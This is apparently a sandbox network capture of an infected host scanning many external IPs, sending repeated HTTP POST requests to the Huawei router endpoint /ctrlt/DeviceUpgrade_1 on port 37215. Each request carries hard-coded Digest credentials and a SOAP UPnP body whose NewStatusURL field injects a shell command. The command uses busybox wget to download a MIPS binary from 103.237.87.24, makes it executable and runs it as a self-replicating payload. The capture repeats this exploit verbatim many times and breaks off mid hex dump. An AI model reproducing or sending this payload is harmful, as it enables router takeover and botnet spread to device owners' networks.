                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2205192.168.2.1334798157.171.188.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596649885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2206192.168.2.1343618197.227.40.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596735954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2207192.168.2.1351466157.11.38.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.597728014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2208192.168.2.134895641.185.196.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.597728968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2209192.168.2.1346248157.171.110.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.597879887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2210192.168.2.1345924197.134.24.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.597882986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2211192.168.2.1355684157.65.97.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.597908020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2212192.168.2.1355660131.64.185.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598010063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2213192.168.2.1353618157.231.166.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598050117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2214192.168.2.134494841.253.115.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598083019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 